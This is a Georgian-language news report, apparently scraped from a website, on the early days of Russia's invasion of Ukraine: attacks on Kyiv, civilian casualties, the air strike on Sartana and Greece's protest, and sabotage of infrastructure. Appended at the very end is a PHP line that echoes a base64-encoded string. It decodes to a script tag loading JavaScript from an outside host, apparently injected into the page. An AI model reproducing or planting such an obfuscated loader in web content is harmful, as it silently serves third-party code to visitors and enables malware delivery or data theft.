celsiusi
ავერსი საქკაბელი
კიევი ისევ საჰაერო თავდასხმის მოლოდინშია, იზრდება მსხვერპლი. უკრაინის დედაქალაქში მოქალაქეებს სახლიდან გასვლა მხოლოდ განგაშის შემთხვევაში შეუძლიათ, რათა თავშესაფრებში გადავიდნენ. დედაქალაქში შეტაკებას 6 წლის ბიჭი ემსხვერპლა, დაშავებულები არიან უკრაინელი მშვიდობიანი მოქალაქეები, მათ შრის ორი ბავშვია.
 
"პოზიციური ბრძოლებია. ბრძოლები მიმდინარეობს იმავე რეგიონებში, სადაც დაიწყო - ხარკოვი, ხერსონი, ოდესა, ნიკოლაევი, სუნი, ჩერნიგოვი, ჟიტომირი. ბრძოლები მიდის ზუსტად იქ, სადაც თავიდანვე იყო. რუსეთის მთავარი მიზანია, შეცვალოს უკრაინის ხელმძღვანელობა, რისი გაკეთებაც მხოლოდ კიევშია შესაძლებელი. უკრაინის ხელმძღვანელობა კიევშია, არსად წასულა და არც აპირებს სადმე წასვლას,"-აცხადებს უკრაინის პრეზიდენტის მრჩეველი.
 
გვიან ღამით, რუსი ოკუპანტების დივერსიულ-სადაზვერვო ჯგუფმა ავტომობილს გაუხსნა ცეცხლი, რა დროსაც სამი ადამიანი გარდაიცვალა, მათ შორის, შვიდი წლის გოგო. ღამით უკრაინის საჰაერო თავდაცვამ კიევის თავზე 2 თვითმფრინავი ჩამოაგდო. რუსული რაკეტები კი რადიოაქტიური ნარჩენების განთავსების ობიექტს მოხვდა.
 
მთელი ღამის განმავლობაში მიმდინარეობდა ბრძოლები კიევის სხვადასხვა უბანში. ოფიციალური წყაროები იუწყებიან, რომ მეორე შეტევა წარმატებით მოიგერიეს უკრაინელებმა. იზრდება მოხალისეობის მსურველი მოქალაქეების რაოდენობაც - ამ ეტაპზე, 35 000-ზე მეტი ადამიანი მობილიზებული ქალაქის ქუჩებში, სტრატეგიულ ობიექტებთან და 35 000-ზე მეტი ავტომატია გაცემული.
 
ამასთან, გვიან ღამით იყო საჰაერო იერიში სოფელ სარტანაზე, რომელიც, ძირითადად, ეთნიკური ბერძნებითაა დასახლებული. შეტევის შედეგად, 10-მდე ადამიანი დაიღუპა და 20-ზე მეტმა სხეულის სხვადასხვა სიმძიმის დაზიანება მიიღო. ფაქტი კატეგორიულად გააპროტესტა საბერძნეთის მთავრობამ, ელჩი დაბარებულია საგარეო საქმეთა სამინისტროში. საბერძნეთი რუსეთს მოუწოდებს, სასწრაფოდ შეწყვიტონ საჰაერო იერიშები.
 
რუსეთის საოკუპაციო ძალებმა უკრაინის კიდევ ერთი სტრატეგიული ობიექტი,  გაზსადენი ააფეთქეს. მანამდე კი ვასილკოვში ნავთობბაზა დაბომბეს. 
 
 
 
706
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");